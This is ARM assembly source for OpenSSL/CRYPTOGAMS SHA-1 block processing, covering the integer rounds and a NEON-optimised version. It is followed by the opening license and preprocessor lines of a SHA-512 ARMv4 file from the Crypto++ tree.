add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r4,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_20_39(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
eor r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_20_39(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp @ preserve carry
#endif
bne .L_20_39_or_60_79 @ [+((12+3)*5+2)*4]
bcs .L_done @ [+((12+3)*5+2)*4], spare 300 bytes
ldr r8,.LK_40_59
sub sp,sp,#20*4 @ [+2]
.L_40_59:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r7,r8,r7,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r5,r6 @ F_xx_xx
mov r9,r9,ror#31
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r4,r10,ror#2 @ F_xx_xx
and r11,r5,r6 @ F_xx_xx
add r7,r7,r9 @ E+=X[i]
add r7,r7,r10 @ E+=F_40_59(B,C,D)
add r7,r7,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
and r11,r4,r5 @ F_xx_xx
add r6,r6,r9 @ E+=X[i]
add r6,r6,r10 @ E+=F_40_59(B,C,D)
add r6,r6,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
and r11,r3,r4 @ F_xx_xx
add r5,r5,r9 @ E+=X[i]
add r5,r5,r10 @ E+=F_40_59(B,C,D)
add r5,r5,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
and r11,r7,r3 @ F_xx_xx
add r4,r4,r9 @ E+=X[i]
add r4,r4,r10 @ E+=F_40_59(B,C,D)
add r4,r4,r11,ror#2
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
and r11,r6,r7 @ F_xx_xx
add r3,r3,r9 @ E+=X[i]
add r3,r3,r10 @ E+=F_40_59(B,C,D)
add r3,r3,r11,ror#2
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_40_59 @ [+((12+5)*5+2)*4]
ldr r8,.LK_60_79
sub sp,sp,#20*4
cmp sp,#0 @ set carry to denote 60_79
b .L_20_39_or_60_79 @ [+4], spare 300 bytes
.L_done:
add sp,sp,#80*4 @ "deallocate" stack frame
ldmia r0,{r8,r9,r10,r11,r12}
add r3,r8,r3
add r4,r9,r4
add r5,r10,r5,ror#2
add r6,r11,r6,ror#2
add r7,r12,r7,ror#2
stmia r0,{r3,r4,r5,r6,r7}
teq r1,r2
bne .Lloop @ [+18], total 1307
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha1_block_data_order,.-cryptogams_sha1_block_data_order
.align 5
.LK_00_19:.word 0x5a827999
.LK_20_39:.word 0x6ed9eba1
.LK_40_59:.word 0x8f1bbcdc
.LK_60_79:.word 0xca62c1d6
.align 5
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl cryptogams_sha1_block_data_order_neon
.type cryptogams_sha1_block_data_order_neon,%function
.align 4
cryptogams_sha1_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
@ dmb @ errata #451034 on early Cortex A8
@ vstmdb sp!,{d8-d15} @ ABI specification says so
mov r14,sp
sub r12,sp,#64
adr r8,.LK_00_19
bic r12,r12,#15 @ align for 128-bit stores
ldmia r0,{r3,r4,r5,r6,r7} @ load context
mov sp,r12 @ alloca
vld1.8 {q0,q1},[r1]! @ handles unaligned
veor q15,q15,q15
vld1.8 {q2,q3},[r1]!
vld1.32 {d28[],d29[]},[r8,:32]! @ load K_00_19
vrev32.8 q0,q0 @ yes, even on
vrev32.8 q1,q1 @ big-endian...
vrev32.8 q2,q2
vadd.i32 q8,q0,q14
vrev32.8 q3,q3
vadd.i32 q9,q1,q14
vst1.32 {q8},[r12,:128]!
vadd.i32 q10,q2,q14
vst1.32 {q9},[r12,:128]!
vst1.32 {q10},[r12,:128]!
ldr r9,[sp] @ big RAW stall
.Loop_neon:
vext.8 q8,q0,q1,#8
bic r10,r6,r4
add r7,r7,r9
and r11,r5,r4
vadd.i32 q13,q3,q14
ldr r9,[sp,#4]
add r7,r7,r3,ror#27
vext.8 q12,q3,q15,#4
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
veor q8,q8,q0
bic r10,r5,r3
add r6,r6,r9
veor q12,q12,q2
and r11,r4,r3
ldr r9,[sp,#8]
veor q12,q12,q8
add r6,r6,r7,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q13,q15,q12,#4
bic r10,r4,r7
add r5,r5,r9
vadd.i32 q8,q12,q12
and r11,r3,r7
ldr r9,[sp,#12]
vsri.32 q8,q12,#31
add r5,r5,r6,ror#27
eor r11,r11,r10
mov r7,r7,ror#2
vshr.u32 q12,q13,#30
add r5,r5,r11
bic r10,r3,r6
vshl.u32 q13,q13,#2
add r4,r4,r9
and r11,r7,r6
veor q8,q8,q12
ldr r9,[sp,#16]
add r4,r4,r5,ror#27
veor q8,q8,q13
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q9,q1,q2,#8
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
vadd.i32 q13,q8,q14
ldr r9,[sp,#20]
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r4,ror#27
vext.8 q12,q8,q15,#4
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
veor q9,q9,q1
bic r10,r6,r4
add r7,r7,r9
veor q12,q12,q3
and r11,r5,r4
ldr r9,[sp,#24]
veor q12,q12,q9
add r7,r7,r3,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q13,q15,q12,#4
bic r10,r5,r3
add r6,r6,r9
vadd.i32 q9,q12,q12
and r11,r4,r3
ldr r9,[sp,#28]
vsri.32 q9,q12,#31
add r6,r6,r7,ror#27
eor r11,r11,r10
mov r3,r3,ror#2
vshr.u32 q12,q13,#30
add r6,r6,r11
bic r10,r4,r7
vshl.u32 q13,q13,#2
add r5,r5,r9
and r11,r3,r7
veor q9,q9,q12
ldr r9,[sp,#32]
add r5,r5,r6,ror#27
veor q9,q9,q13
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q10,q2,q3,#8
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
vadd.i32 q13,q9,q14
ldr r9,[sp,#36]
add r4,r4,r5,ror#27
vext.8 q12,q9,q15,#4
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
veor q10,q10,q2
bic r10,r7,r5
add r3,r3,r9
veor q12,q12,q8
and r11,r6,r5
ldr r9,[sp,#40]
veor q12,q12,q10
add r3,r3,r4,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q13,q15,q12,#4
bic r10,r6,r4
add r7,r7,r9
vadd.i32 q10,q12,q12
and r11,r5,r4
ldr r9,[sp,#44]
vsri.32 q10,q12,#31
add r7,r7,r3,ror#27
eor r11,r11,r10
mov r4,r4,ror#2
vshr.u32 q12,q13,#30
add r7,r7,r11
bic r10,r5,r3
vshl.u32 q13,q13,#2
add r6,r6,r9
and r11,r4,r3
veor q10,q10,q12
ldr r9,[sp,#48]
add r6,r6,r7,ror#27
veor q10,q10,q13
eor r11,r11,r10
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q11,q3,q8,#8
bic r10,r4,r7
add r5,r5,r9
and r11,r3,r7
vadd.i32 q13,q10,q14
ldr r9,[sp,#52]
add r5,r5,r6,ror#27
vext.8 q12,q10,q15,#4
eor r11,r11,r10
mov r7,r7,ror#2
add r5,r5,r11
veor q11,q11,q3
bic r10,r3,r6
add r4,r4,r9
veor q12,q12,q9
and r11,r7,r6
ldr r9,[sp,#56]
veor q12,q12,q11
add r4,r4,r5,ror#27
eor r11,r11,r10
vst1.32 {q13},[r12,:128]!
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q13,q15,q12,#4
bic r10,r7,r5
add r3,r3,r9
vadd.i32 q11,q12,q12
and r11,r6,r5
ldr r9,[sp,#60]
vsri.32 q11,q12,#31
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
vshr.u32 q12,q13,#30
add r3,r3,r11
bic r10,r6,r4
vshl.u32 q13,q13,#2
add r7,r7,r9
and r11,r5,r4
veor q11,q11,q12
ldr r9,[sp,#0]
add r7,r7,r3,ror#27
veor q11,q11,q13
eor r11,r11,r10
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q10,q11,#8
bic r10,r5,r3
add r6,r6,r9
and r11,r4,r3
veor q0,q0,q8
ldr r9,[sp,#4]
add r6,r6,r7,ror#27
veor q0,q0,q1
eor r11,r11,r10
mov r3,r3,ror#2
vadd.i32 q13,q11,q14
add r6,r6,r11
bic r10,r4,r7
veor q12,q12,q0
add r5,r5,r9
and r11,r3,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r11,r10
mov r7,r7,ror#2
vsli.32 q0,q12,#2
add r5,r5,r11
bic r10,r3,r6
add r4,r4,r9
and r11,r7,r6
ldr r9,[sp,#12]
add r4,r4,r5,ror#27
eor r11,r11,r10
mov r6,r6,ror#2
add r4,r4,r11
bic r10,r7,r5
add r3,r3,r9
and r11,r6,r5
ldr r9,[sp,#16]
add r3,r3,r4,ror#27
eor r11,r11,r10
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q11,q0,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#20]
veor q1,q1,q9
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q1,q1,q2
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q0,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q1
ldr r9,[sp,#24]
eor r11,r10,r4
vshr.u32 q1,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q1,q12,#2
add r5,r5,r9
ldr r9,[sp,#28]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#32]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q0,q1,#8
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#36]
veor q2,q2,q10
eor r11,r10,r6
add r3,r3,r4,ror#27
veor q2,q2,q3
mov r5,r5,ror#2
add r3,r3,r11
vadd.i32 q13,q1,q14
eor r10,r4,r6
vld1.32 {d28[],d29[]},[r8,:32]!
add r7,r7,r9
veor q12,q12,q2
ldr r9,[sp,#40]
eor r11,r10,r5
vshr.u32 q2,q12,#30
add r7,r7,r3,ror#27
mov r4,r4,ror#2
vst1.32 {q13},[r12,:128]!
add r7,r7,r11
eor r10,r3,r5
vsli.32 q2,q12,#2
add r6,r6,r9
ldr r9,[sp,#44]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#48]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q1,q2,#8
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r7
add r4,r4,r5,ror#27
veor q3,q3,q8
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q2,q14
eor r10,r5,r7
add r3,r3,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r6
vshr.u32 q3,q12,#30
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vst1.32 {q13},[r12,:128]!
add r3,r3,r11
eor r10,r4,r6
vsli.32 q3,q12,#2
add r7,r7,r9
ldr r9,[sp,#60]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#0]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q2,q3,#8
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#4]
veor q8,q8,q0
eor r11,r10,r3
add r5,r5,r6,ror#27
veor q8,q8,q9
mov r7,r7,ror#2
add r5,r5,r11
vadd.i32 q13,q3,q14
eor r10,r6,r3
add r4,r4,r9
veor q12,q12,q8
ldr r9,[sp,#8]
eor r11,r10,r7
vshr.u32 q8,q12,#30
add r4,r4,r5,ror#27
mov r6,r6,ror#2
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
add r4,r4,r11
eor r10,r5,r7
vsli.32 q8,q12,#2
add r3,r3,r9
ldr r9,[sp,#12]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#16]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q3,q8,#8
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#20]
veor q9,q9,q1
eor r11,r10,r4
add r6,r6,r7,ror#27
veor q9,q9,q10
mov r3,r3,ror#2
add r6,r6,r11
vadd.i32 q13,q8,q14
eor r10,r7,r4
add r5,r5,r9
veor q12,q12,q9
ldr r9,[sp,#24]
eor r11,r10,r3
vshr.u32 q9,q12,#30
add r5,r5,r6,ror#27
mov r7,r7,ror#2
vst1.32 {q13},[r12,:128]!
add r5,r5,r11
eor r10,r6,r3
vsli.32 q9,q12,#2
add r4,r4,r9
ldr r9,[sp,#28]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#32]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q8,q9,#8
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#36]
veor q10,q10,q2
add r7,r7,r3,ror#27
eor r11,r5,r6
veor q10,q10,q11
add r7,r7,r10
and r11,r11,r4
vadd.i32 q13,q9,q14
mov r4,r4,ror#2
add r7,r7,r11
veor q12,q12,q10
add r6,r6,r9
and r10,r4,r5
vshr.u32 q10,q12,#30
ldr r9,[sp,#40]
add r6,r6,r7,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r4,r5
add r6,r6,r10
vsli.32 q10,q12,#2
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#44]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#48]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q9,q10,#8
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#52]
veor q11,q11,q3
add r3,r3,r4,ror#27
eor r11,r6,r7
veor q11,q11,q0
add r3,r3,r10
and r11,r11,r5
vadd.i32 q13,q10,q14
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
veor q12,q12,q11
add r7,r7,r9
and r10,r5,r6
vshr.u32 q11,q12,#30
ldr r9,[sp,#56]
add r7,r7,r3,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r5,r6
add r7,r7,r10
vsli.32 q11,q12,#2
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#60]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#0]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q10,q11,#8
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#4]
veor q0,q0,q8
add r4,r4,r5,ror#27
eor r11,r7,r3
veor q0,q0,q1
add r4,r4,r10
and r11,r11,r6
vadd.i32 q13,q11,q14
mov r6,r6,ror#2
add r4,r4,r11
veor q12,q12,q0
add r3,r3,r9
and r10,r6,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r3,r3,r4,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r6,r7
add r3,r3,r10
vsli.32 q0,q12,#2
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#12]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#16]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q11,q0,#8
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#20]
veor q1,q1,q9
add r5,r5,r6,ror#27
eor r11,r3,r4
veor q1,q1,q2
add r5,r5,r10
and r11,r11,r7
vadd.i32 q13,q0,q14
mov r7,r7,ror#2
add r5,r5,r11
veor q12,q12,q1
add r4,r4,r9
and r10,r7,r3
vshr.u32 q1,q12,#30
ldr r9,[sp,#24]
add r4,r4,r5,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r7,r3
add r4,r4,r10
vsli.32 q1,q12,#2
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#28]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#32]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q0,q1,#8
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#36]
veor q2,q2,q10
add r6,r6,r7,ror#27
eor r11,r4,r5
veor q2,q2,q3
add r6,r6,r10
and r11,r11,r3
vadd.i32 q13,q1,q14
mov r3,r3,ror#2
add r6,r6,r11
veor q12,q12,q2
add r5,r5,r9
and r10,r3,r4
vshr.u32 q2,q12,#30
ldr r9,[sp,#40]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r3,r4
add r5,r5,r10
vsli.32 q2,q12,#2
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#44]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#48]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q1,q2,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q3,q3,q8
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q2,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r4
vshr.u32 q3,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q3,q12,#2
add r5,r5,r9
ldr r9,[sp,#60]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#0]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q3,q14
eor r10,r5,r7
add r3,r3,r9
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
teq r1,r2
sub r8,r8,#16
it eq
subeq r1,r1,#64
vld1.8 {q0,q1},[r1]!
ldr r9,[sp,#4]
eor r11,r10,r6
vld1.8 {q2,q3},[r1]!
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
eor r10,r4,r6
vrev32.8 q0,q0
add r7,r7,r9
ldr r9,[sp,#8]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#12]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#16]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vrev32.8 q1,q1
eor r10,r6,r3
add r4,r4,r9
vadd.i32 q8,q0,q14
ldr r9,[sp,#20]
eor r11,r10,r7
vst1.32 {q8},[r12,:128]!
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#24]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#28]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#32]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vrev32.8 q2,q2
eor r10,r7,r4
add r5,r5,r9
vadd.i32 q9,q1,q14
ldr r9,[sp,#36]
eor r11,r10,r3
vst1.32 {q9},[r12,:128]!
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#40]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#44]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#48]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vrev32.8 q3,q3
eor r10,r3,r5
add r6,r6,r9
vadd.i32 q10,q2,q14
ldr r9,[sp,#52]
eor r11,r10,r4
vst1.32 {q10},[r12,:128]!
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#56]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#60]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
ldmia r0,{r9,r10,r11,r12} @ accumulate context
add r3,r3,r9
ldr r9,[r0,#16]
add r4,r4,r10
add r5,r5,r11
add r6,r6,r12
it eq
moveq sp,r14
add r7,r7,r9
it ne
ldrne r9,[sp]
stmia r0,{r3,r4,r5,r6,r7}
itt ne
addne r12,sp,#3*16
bne .Loop_neon
@ vldmia sp!,{d8-d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size cryptogams_sha1_block_data_order_neon,.-cryptogams_sha1_block_data_order_neon
#endif
|
Akhil-Sharma-26/yeet
| 42,371
|
external/cryptopp/sha512_armv4.S
|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
